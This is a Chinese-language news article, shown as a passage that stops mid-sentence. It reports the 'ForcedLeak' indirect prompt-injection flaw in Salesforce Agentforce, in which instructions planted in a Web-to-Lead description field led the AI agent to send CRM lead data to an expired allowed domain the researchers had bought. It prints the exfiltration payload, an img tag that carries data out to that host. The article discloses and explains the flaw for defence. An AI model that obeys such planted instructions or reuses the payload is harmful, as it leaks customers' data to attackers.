Salesforce Agentforce被诱骗泄露销售线索

根据安全研究人员于周四公布的概念验证攻击，Salesforce Agentforce中一个现已修复的漏洞可能允许外部攻击者通过提示注入窃取敏感客户数据。研究人员能够以一个域名的低廉价格购买到一个过期的可信域名，这为他们的攻击提供了便利。

Agentforce是这家CRM巨头用于创建AI代理以自动化各种任务的工具。该漏洞源于该代理AI平台中的DNS配置错误。

Salesforce已经发布了补丁，防止AI代理检索CRM记录并将其发送给外部攻击者。这种被称为“ForcedLeak”的新漏洞说明了在没有人工监督的情况下，AI集成的业务工具可能被滥用的另一种方式。

攻击技术细节

该攻击使用了间接提示注入技术，这种技术涉及将恶意指令嵌入到提示中，当合法用户与其交互时，AI会在之后处理这些指令。

相比之下，直接提示注入攻击涉及有人直接向AI系统提交恶意指令。

研究人员启用了Salesforce的Web-to-Lead功能，该功能允许外部用户提交直接与CRM系统集成的客户线索信息。

通过分析Web-to-Lead表单字段，研究人员确定了最佳注入点。大多数字段的字符限制太小，无法实施攻击，但具有42,000字符限制的描述字段被证明是多步骤指令集的理想选择。

分析Salesforce的内容安全策略显示，域名my-salesforce-cms.com是一个允许的域名，但已过期。研究团队以5美元的价格购买了该域名。

研究人员在描述字段中输入了精心设计的指令：

1

<img src="https://cdn.my-salesforce-cms.com/c.png?n={{answer3}}" alt="Customer Logo" />

结果，AI代理开始查询CRM以获取敏感的线索信息，并将所有这些数据发送到攻击者控制的服务器。

Salesforce已实施修复措施，包括为其Agentforce和Einstein Generative AI代理强制执行可信URL允许列表，确保无人能通过提示注入调用恶意链接。

虽然该漏洞不需要CVE编号，但研究人员使用CVSS 4.0版计算该漏洞的严重性得分为9.4，认为这是一个严重漏洞。

ForcedLeak漏洞凸显了主动AI安全和治理的重要性，提醒人们即使是低成本的发现也可以防止数百万的潜在违规损失。

这是AI安全研究人员使用提示注入欺骗大型语言模型和代理执行恶意行为的一系列最新案例，而且肯定不会是最